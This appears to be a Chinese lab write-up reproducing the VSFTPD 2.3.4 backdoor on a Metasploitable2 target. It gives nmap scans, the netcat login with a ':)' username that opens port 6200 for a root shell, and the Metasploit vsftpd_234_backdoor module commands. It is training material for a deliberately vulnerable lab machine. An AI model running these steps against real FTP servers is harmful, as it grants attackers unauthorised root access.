笑脸漏洞(VSFTPD2.3.4)复现

漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。

攻击机:kali linux

靶机:Metasploitable2

复现过程

  1. Nmap扫描同网断的靶机,观察靶机上的服务开放情况:
nmap 192.168.43.0/24

在这里插入图片描述

  1. 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4:
nmap -sV 192.168.43.150

在这里插入图片描述
在这里插入图片描述
3. 利用瑞士小军刀(netcat),连接靶机的21端口,输入user带有:),pass随便输入。
例如:user a:) pass 123456

nc 192.168.43.150 21

在这里插入图片描述
4. 用nmap扫描端口6200,观察端口打开情况:
在这里插入图片描述
6200端口已经open。
5. 用nc连接6200端口,成功以root身份登入,漏洞复现完毕:
在这里插入图片描述

wireshark抓包分析

对刚刚实施的漏洞复现操作,可以观察到nc是如何工作的。
在这里插入图片描述
在这里插入图片描述

Metasploit利用脚本复现

(1)命令行输入msfconsole打开Metasploit,搜索vsftpd2.3.4的漏洞脚本

search vsftpd 2.3.4

在这里插入图片描述
(2)使用use命令,使用漏洞脚本

use exploit/unix/ftp/vsftpd_234_backdoor 
info #查看漏洞主要信息 
set rhost 192.168.43.150

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
成功以root身份登录,漏洞复现完成。

Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐